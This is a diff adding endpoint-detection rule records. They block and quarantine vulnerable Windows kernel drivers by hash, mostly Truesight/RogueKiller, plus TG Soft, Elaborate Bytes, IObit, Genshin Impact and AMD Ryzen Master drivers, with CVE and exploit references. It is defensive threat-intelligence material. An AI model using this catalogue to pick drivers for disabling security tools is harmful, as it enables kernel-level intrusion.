+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c3181cd-bf78-5b6e-b273-cd3600bc8102",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148242Z",
+ "creation_date": "2026-03-23T11:45:31.148244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148249Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a41dc1a32edc8073ee13dee590762343acd252a29d1eddc77bb8faeac52a3fea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c326e83-7946-5af6-ae18-19a9c97600ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835434Z",
+ "creation_date": "2026-03-23T11:45:30.835437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88f52739de1bc336101fdc25aa7e82cbe497c0413993ba4b9ed387a588d7f1c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c3e2f13-067d-5240-a3d4-e5cdd9687e46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141139Z",
+ "creation_date": "2026-03-23T11:45:31.141141Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a73c288bd1f33f7c56d184588d072a3f548f31cfb5b48e1c53e1beb433cee2b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c41e7e2-ef7d-5c2b-9e6e-b88b58526868",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825799Z",
+ "creation_date": "2026-03-23T11:45:30.825801Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825807Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "824370a49c9fbec55d79723417b9a97abbd613ed04e796a46ed7dc7a00bf1145",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c422499-0305-50f8-94ae-1702d73c93a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808211Z",
+ "creation_date": "2026-03-23T11:45:31.808214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808223Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ee0dde4515bdb59defb7cc0fc31c0b04a7d72c81c42bde05a5694a7d3ff8f83",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c42c62d-ad6d-557b-8f6d-2a11ba7f309d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972629Z",
+ "creation_date": "2026-03-23T11:45:29.972631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef6d3c00f9d0aa31a218094480299ef73fc85146adf62fd0c2f4f88972c5c850",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c43dbdf-1e8f-524e-a477-a86d93d47218",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499055Z",
+ "creation_date": "2026-03-23T11:45:31.499058Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15718b07267354eb5d30fa8ab0903b013af854303b7def4981724715fcfacdb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c5f353f-0b0f-5f7e-8104-78eb4a923c3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818278Z",
+ "creation_date": "2026-03-23T11:45:30.818280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818285Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db0d425708ba908aedf5f8762d6fdca7636ae3a537372889446176c0237a2836",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c60f1ff-c593-5a69-9093-b120146da657",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141750Z",
+ "creation_date": "2026-03-23T11:45:31.141752Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141757Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e42df3a98ebb36cf1d90f71fd179625cded05c29519e6322a4bef1b06b3f685",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c6dcf3b-6e07-5678-b802-c37b99f787c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973252Z",
+ "creation_date": "2026-03-23T11:45:29.973254Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973259Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e85d36ca271c4d65abc1cdfff0e629dc5d14edb5bf97669badbb40d2715c1d47",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c704d4f-f6b5-57d4-bda8-b5903e870bcd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457099Z",
+ "creation_date": "2026-03-23T11:45:30.457103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e73bb03d54b40035558df2e990367a1c4e9c1ef8e980df6380a63f3bc23e6740",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c7b05a0-da47-5f77-85f6-34cbb07a5a53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488275Z",
+ "creation_date": "2026-03-23T11:45:31.488277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e81366817f6b3eb948e2e321a4f269d87577a4a28d93939502f5d48226dfa0a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4cc183d5-8968-5e24-89aa-65bcb2d09cd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159049Z",
+ "creation_date": "2026-03-23T11:45:31.159051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7434d979a87f4e94b5dc7d4609527fe966875fea40cf0f74e359b6cbddd5d07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4cdd3d97-4c28-577c-93d1-8cd9774c75fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825160Z",
+ "creation_date": "2026-03-23T11:45:30.825163Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825171Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab95c07bad9f17628528a8194d100eca63d82920c4da51c65183f537e748ddde",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4cf88e37-2007-59cb-aec4-ca7802c0b4fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611983Z",
+ "creation_date": "2026-03-23T11:45:29.611986Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8eed6b4a1e6f7dd66807beeb6ff71f8b34cd8c7777f1e31d326cb87593e8f836",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d00eb26-b42c-5acb-8ad7-5daaff8264e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160203Z",
+ "creation_date": "2026-03-23T11:45:31.160206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8ba80ff4af6dd6c03c9db67b1130b034e93305440c3ca68d30126f0850e675d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d067e16-d124-5950-b195-9b7f9ce4be89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491602Z",
+ "creation_date": "2026-03-23T11:45:31.491605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e3c0b260d1fdaf2b0e3ebe7a7db4091f743cfda4f6ee1c5ec3a6be353beec9c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d11f3bd-0675-58c2-a6b6-22ecd17de901",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975378Z",
+ "creation_date": "2026-03-23T11:45:29.975379Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975385Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "679de7449908838c031db59234cb4f482fbf5d27d7e02d0c30d5ad9d2f36495f",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d1a1987-284d-5c9c-86d5-c4021db29f03",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155171Z",
+ "creation_date": "2026-03-23T11:45:31.155173Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155178Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72ca07aafc94be8f6f6e5b37003b1645f26bd50fdb3a788e2a3191e0bbf78251",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d1f115f-34f7-574c-8778-2ad46a4bca65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148936Z",
+ "creation_date": "2026-03-23T11:45:31.148938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148944Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a07307d863085ae5779d8ba13dac5c3a4de25b93294e376775ae93c8d0845b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d2990a5-9628-5e97-8050-da14994367cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473829Z",
+ "creation_date": "2026-03-23T11:45:31.473833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fd3d76efd5584382b156ca17fe96d0a1c951fee2a804044dc6325d8e85aeef5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d30f7c7-3bcf-5965-9ecd-e54e1027ad99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495956Z",
+ "creation_date": "2026-03-23T11:45:31.495959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495967Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c58bc7080d7afb1ca252ea6790d2121f247d331f6e208690ea6c02f3d776499e",
